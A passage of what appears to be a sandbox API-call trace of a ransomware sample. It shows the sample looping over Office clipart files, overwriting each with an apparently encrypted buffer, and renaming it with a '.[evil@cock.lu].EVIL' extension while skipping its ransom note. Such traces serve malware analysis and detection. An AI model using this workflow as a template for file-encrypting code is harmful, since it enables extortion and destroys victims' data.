lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.824] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.824] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.824] _errno () returned 0x84b1160840 [0132.824] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.824] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.824] CloseHandle (hObject=0x1a8) returned 1 [0132.824] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.824] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.825] __uncaught_exception () returned 0x84b1160800 [0132.825] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.825] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101865.bmp.[evil@cock.lu].evil")) returned 1 [0132.826] ??_V@YAXPEAX@Z () returned 0x1 [0132.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101865.BMP", dwFileAttributes=0x200) returned 0 [0132.828] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.828] wcsstr (_Str="J0101866.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.828] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 69 [0132.828] wcscmp (_String1="J0101866.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.828] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101866.BMP") returned 0x0 [0132.828] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP") returned 0x45 [0132.828] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.830] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0132.913] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.913] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.913] _errno () returned 0x84b1160840 [0132.913] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.914] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0132.914] CloseHandle (hObject=0x1a8) returned 1 [0132.914] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.914] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.914] __uncaught_exception () returned 0x84b1160800 [0132.914] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.914] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101866.bmp.[evil@cock.lu].evil")) returned 1 [0132.915] ??_V@YAXPEAX@Z () returned 0x1 [0132.918] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101866.BMP", dwFileAttributes=0x200) returned 0 [0132.918] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.918] wcsstr (_Str="J0101867.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.918] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 69 [0132.918] wcscmp (_String1="J0101867.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.918] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101867.BMP") returned 0x0 [0132.918] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP") returned 0x45 [0132.918] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0132.937] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7f68, lpOverlapped=0x0) returned 1 [0132.978] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.978] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0132.978] _errno () returned 0x84b1160840 [0132.978] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.978] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x7f80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7f80, lpOverlapped=0x0) returned 1 [0132.978] CloseHandle (hObject=0x1a8) returned 1 [0132.978] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0132.978] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0132.978] __uncaught_exception () returned 0x84b1160800 [0132.978] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0132.979] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101867.bmp.[evil@cock.lu].evil")) returned 1 [0132.979] ??_V@YAXPEAX@Z () returned 0x1 [0132.982] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101867.BMP", dwFileAttributes=0x200) returned 0 [0132.982] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0132.983] wcsstr (_Str="J0101980.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0132.983] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 69 [0132.983] wcscmp (_String1="J0101980.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0132.983] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0101980.WMF") returned 0x0 [0132.983] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF") returned 0x45 [0132.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.042] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3ee8, lpOverlapped=0x0) returned 1 [0133.050] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.050] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.050] _errno () returned 0x84b1160840 [0133.051] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.051] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3f00, lpOverlapped=0x0) returned 1 [0133.051] CloseHandle (hObject=0x1a8) returned 1 [0133.051] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.051] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.051] __uncaught_exception () returned 0x84b1160800 [0133.051] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.051] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0101980.wmf.[evil@cock.lu].evil")) returned 1 [0133.052] ??_V@YAXPEAX@Z () returned 0x1 [0133.055] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0101980.WMF", dwFileAttributes=0x200) returned 0 [0133.055] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.055] wcsstr (_Str="J0102002.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.055] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 69 [0133.055] wcscmp (_String1="J0102002.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.055] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0102002.WMF") returned 0x0 [0133.055] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF") returned 0x45 [0133.055] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.058] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3e74, lpOverlapped=0x0) returned 1 [0133.080] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.080] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.080] _errno () returned 0x84b1160840 [0133.080] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.080] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x3e80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3e80, lpOverlapped=0x0) returned 1 [0133.080] CloseHandle (hObject=0x1a8) returned 1 [0133.080] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.080] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.080] __uncaught_exception () returned 0x84b1160800 [0133.080] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.081] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102002.wmf.[evil@cock.lu].evil")) returned 1 [0133.081] ??_V@YAXPEAX@Z () returned 0x1 [0133.084] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102002.WMF", dwFileAttributes=0x200) returned 0 [0133.084] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.084] wcsstr (_Str="J0102594.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.084] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 69 [0133.084] wcscmp (_String1="J0102594.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.084] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0102594.WMF") returned 0x0 [0133.084] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF") returned 0x45 [0133.084] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.086] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6978, lpOverlapped=0x0) returned 1 [0133.147] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.147] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.147] _errno () returned 0x84b1160840 [0133.147] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.147] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x6980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6980, lpOverlapped=0x0) returned 1 [0133.147] CloseHandle (hObject=0x1a8) returned 1 [0133.147] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.148] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.148] __uncaught_exception () returned 0x84b1160800 [0133.148] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.148] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102594.wmf.[evil@cock.lu].evil")) returned 1 [0133.149] ??_V@YAXPEAX@Z () returned 0x1 [0133.151] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102594.WMF", dwFileAttributes=0x200) returned 0 [0133.152] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.152] wcsstr (_Str="J0102762.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.152] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 69 [0133.152] wcscmp (_String1="J0102762.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.152] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0102762.WMF") returned 0x0 [0133.152] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 0x45 [0133.152] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.154] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2bd0, lpOverlapped=0x0) returned 1 [0133.190] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.190] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.190] _errno () returned 0x84b1160840 [0133.190] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.190] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2be0, lpOverlapped=0x0) returned 1 [0133.190] CloseHandle (hObject=0x1a8) returned 1 [0133.190] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.191] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.191] __uncaught_exception () returned 0x84b1160800 [0133.191] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.191] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf.[evil@cock.lu].evil")) returned 1 [0133.192] ??_V@YAXPEAX@Z () returned 0x1 [0133.194] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF", dwFileAttributes=0x200) returned 0 [0133.194] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.194] wcsstr (_Str="J0102984.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.194] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 69 [0133.195] wcscmp (_String1="J0102984.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.195] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0102984.WMF") returned 0x0 [0133.195] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 0x45 [0133.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.197] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4290, lpOverlapped=0x0) returned 1 [0133.216] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.216] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.216] _errno () returned 0x84b1160840 [0133.216] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.216] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x42a0, lpOverlapped=0x0) returned 1 [0133.216] CloseHandle (hObject=0x1a8) returned 1 [0133.216] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0133.216] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0133.216] __uncaught_exception () returned 0x84b1160800 [0133.216] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0133.217] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf.[evil@cock.lu].evil")) returned 1 [0133.217] ??_V@YAXPEAX@Z () returned 0x1 [0133.220] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF", dwFileAttributes=0x200) returned 0 [0133.220] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0133.220] wcsstr (_Str="J0103058.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0133.220] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 69 [0133.220] wcscmp (_String1="J0103058.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0133.220] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0103058.WMF") returned 0x0 [0133.220] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 0x45 [0133.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0133.222] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x43c0, lpOverlapped=0x0) returned 1 [0133.235] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.235] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0133.235] _errno () returned 0x84b1160840 [0133.235] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.235] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x43e0, lpNumberOfBytesWritten=0x84b0fdd7a0, 